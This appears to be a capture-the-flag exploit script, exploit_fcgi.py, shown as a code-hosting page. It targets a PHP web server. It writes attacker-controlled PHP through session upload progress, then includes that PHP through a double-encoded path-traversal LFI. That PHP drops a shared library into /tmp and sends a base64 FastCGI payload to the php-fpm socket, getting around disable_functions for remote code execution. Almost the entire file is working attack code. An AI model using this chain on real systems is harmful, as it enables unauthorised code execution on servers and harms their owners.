/
exploit_fcgi.py
78 lines (58 loc) · 2.85 KB
/
exploit_fcgi.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
# coded by d4rkstat1c
import requests
from urllib.parse import quote as urlencode
from base64 import b64encode
TARGET = 'http://<IP>:<PORT>'
# FastCGI payload generated from payload_gen.py and converted to base64 using http://icyberchef.com
B64_FCGI_PAYLOAD = 'AQEYpQAIAAAAAQAAAAAAAAEEGKUBowAAEQtHQVRFV0FZX0lOVEVSRkFDRUZhc3RDR0kvMS4wDgRSRVFVRVNUX01FVEhPRFBPU1QPDlNDUklQVF9GSUxFTkFNRS93d3cvaW5kZXgucGhwCwpTQ1JJUFRfTkFNRS9pbmRleC5waHAMAFFVRVJZX1NUUklORwsKUkVRVUVTVF9VUkkvaW5kZXgucGhwDQRET0NVTUVOVF9ST09UL3d3dw8OU0VSVkVSX1NPRlRXQVJFcGhwL2ZjZ2ljbGllbnQLCVJFTU9URV9BRERSMTI3LjAuMC4xCwRSRU1PVEVfUE9SVDk5ODULCVNFUlZFUl9BRERSMTI3LjAuMC4xCwJTRVJWRVJfUE9SVDgwCwlTRVJWRVJfTkFNRWxvY2FsaG9zdA8IU0VSVkVSX1BST1RPQ09MSFRUUC8xLjEMIUNPTlRFTlRfVFlQRWFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA4BQ09OVEVOVF9MRU5HVEgwDxhQSFBfQURNSU5fVkFMVUVleHRlbnNpb24gPSAvdG1wL2V4ZWMuc28BBBilAAAAAAEFGKUAAQAAeAEFGKUAAAAA'
SESS_NAME = 'junkid'
SESS_FILE = 'sess_' + SESS_NAME
FLAG_FILE = 'flag'
EXT_FILE = 'exec.so'
def read_so(file):
with open(file, 'rb') as f:
return b64encode(f.read())
def write_tmp(payload):
# SESS_NAME will be the file we will include via LFI to initiate php execution
phpsessid = {'PHPSESSID': SESS_NAME}
# The below data is useless, we include this to match the multi-part form data's signature
junk_file = {'file': b'junk'}
# Bulk of the arbitrary write
data = {'PHP_SESSION_UPLOAD_PROGRESS': payload}
# Trigger the arbitrary write
requests.post(TARGET, cookies=phpsessid, files=junk_file, data=data)
def lfi_gen(file):
payload = '../'*12 + '../tmp/' + file
for _ in range(2):
payload = urlencode(payload, 'urlencode')
return TARGET + '/miner/' + payload
def exploit_lfi(file):
lfi_url = lfi_gen(file)
r = requests.get(lfi_url)
return r.text
def write_so():
# Read the so file's bytes.
b64_so = read_so('exec.so')
# The below payload will write the .so file to the /tmp directory when executed
format_payload = '<?php file_put_contents("/tmp/{EXT_FILE}", base64_decode("{b64_so}")); ?>'
so_payload = format_payload.format(EXT_FILE=EXT_FILE, b64_so=b64_so.decode().strip())
# write our payload to the /tmp directory
write_tmp(so_payload)
# trigger execution via inclusion
exploit_lfi(SESS_FILE)
def fcgi_gen():
fcgi_payload = '<?php $fp = stream_socket_client("unix:///run/php-fpm.sock", $errno, $errstr, 30); fwrite($fp, base64_decode("{B64_FCGI_PAYLOAD}")); ?>'
return fcgi_payload.format(B64_FCGI_PAYLOAD=B64_FCGI_PAYLOAD)
def main():
# write so file to /tmp directory
write_so()
# Generate our RCE php fastcgi payload to bypass disable functions
fcgi_payload = fcgi_gen()
# write the fcgi_payload to the /tmp directory
write_tmp(fcgi_payload)
# exploit LFI to include the php code and gain RCE
exploit_lfi(SESS_FILE)
# finally read the flag wrote to /tmp/flag due to execution of the shared library
print(exploit_lfi(FLAG_FILE))
if __name__ == '__main__':
main()